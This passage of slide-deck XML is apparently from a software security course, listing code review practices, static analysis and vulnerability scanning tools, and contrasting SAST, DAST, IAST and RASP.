                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Manual review and automated review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Manual review: usually by peers </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Automated review using static code analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify defects and improve quality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Functional defects</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad smells </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerabilities </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Code Analysis Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p46"/>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lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Microsoft DevSkim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Android studio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> Linter</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Findbugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SpotBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>FindSecBugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Pylint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>JSLint</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>PMD</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="180000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>SonarQube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>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Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p47"/>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Risk-based Security Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Exploit the system like attackers</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Blackbox testing </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability Scanning Tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Zed Attack Proxy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Arachni</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Burp Suite by Portswigger</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Appspider by Rapid 7 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Netsparker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="00578A"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Web Hacking: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.hacker101.com/playlists/web_hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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8"/>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SAST vs DAST</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288" name="Google Shape;288;p48"/>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Static application security testing (SAST)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>White-box testing (source code accessible)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Identify easy-to-fix bugs, flaws and vulnerabilities in code. </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Prone to false positives and false negatives</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Dynamic application security testing (DAST) </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Blackbox testing (require functional product)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Identify more complex run time issues, but usually harder to fix</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Prone to false negatives</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Mostly used to testing web applications and services</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9"/>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IAST &amp;  RASP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Google Shape;294;p49"/>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Interactive Application Security Testing (IAST): </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Through application instrumentation.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Analyze the application code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Monitor run time issues</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
